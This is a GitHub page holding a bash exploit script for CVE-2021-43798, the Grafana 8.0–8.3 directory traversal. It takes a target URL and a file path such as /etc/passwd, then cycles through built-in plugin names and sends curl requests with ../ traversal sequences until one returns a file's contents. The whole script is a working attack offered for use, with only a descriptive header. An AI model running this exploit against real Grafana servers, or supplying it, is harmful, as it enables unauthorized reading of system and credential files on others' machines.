-
Notifications
You must be signed in to change notification settings - Fork 0
/
ExploitGrafana.sh
108 lines (96 loc) · 2.43 KB
/
ExploitGrafana.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/bin/bash
# Exploit Title: Grafana 8.0 - 8.3 - - Directory Traversal and Arbitrary File Read
# Date: 20/12/2023
# Exploit Author: Brutus
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Ubuntu VERSION="20.04.2 LTS (Focal Fossa)
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
# Usage ex: ./ExploitGrafana.sh -h http://domain.com:3000 -f /etc/passwd
show_help() {
echo "Usage: $0 [-h domain] [-f file_path]" >&2
echo " -h (ex: http://novo-dominio:3000)"
echo " -f (ex: /dir/file_to_read)"
exit 1
}
PARAMETER_DOMAIN=false
PARAMETER_FILE_PATH=false
while getopts "h:f:" opt; do
case $opt in
h)
DOMAIN=$OPTARG
PARAMETER_DOMAIN=true
;;
f)
FILE_PATH=$OPTARG
PARAMETER_FILE_PATH=true
;;
-?)
show_help
;;
\?)
echo "invalid Option: -$OPTARG" >&2
show_help
;;
esac
done
if [ "$PARAMETER_DOMAIN" = false ] || [ "$PARAMETER_FILE_PATH" = false ]; then
echo "The parameters -h (domain) e -f (file path) They are mandatory. See help using: $0 --help"
exit 1
fi
plugins=("alertlist"
"annolist"
"barchart"
"bargauge"
"candlestick"
"cloudwatch"
"dashlist"
"elasticsearch"
"gauge"
"geomap"
"gettingstarted"
"grafana-azure-monitor-datasource"
"graph"
"heatmap"
"histogram"
"influxdb"
"jaeger"
"logs"
"loki"
"mssql"
"mysql"
"news"
"nodeGraph"
"opentsdb"
"piechart"
"pluginlist"
"postgres"
"prometheus"
"stackdriver"
"stat"
"state-timeline"
"status-histor"
"table"
"table-old"
"tempo"
"testdata"
"text"
"timeseries"
"welcome"
"zipkin")
count=0
for plugin in "${plugins[@]}"; do
response=$(curl -v --path-as-is "${DOMAIN}/public/plugins/$plugin/../../../../../../../../../../../../../${FILE_PATH}" 2>&1)
if echo "$response" | grep -q "HTTP/1.1 200 OK"; then
echo "Plugin $plugin Status code 200:"
echo "$response"
break
fi
count=$((count + 1))
done
if [ "$count" -eq "${#plugins[@]}" ]; then
echo "No plugins returned status code 200."
fi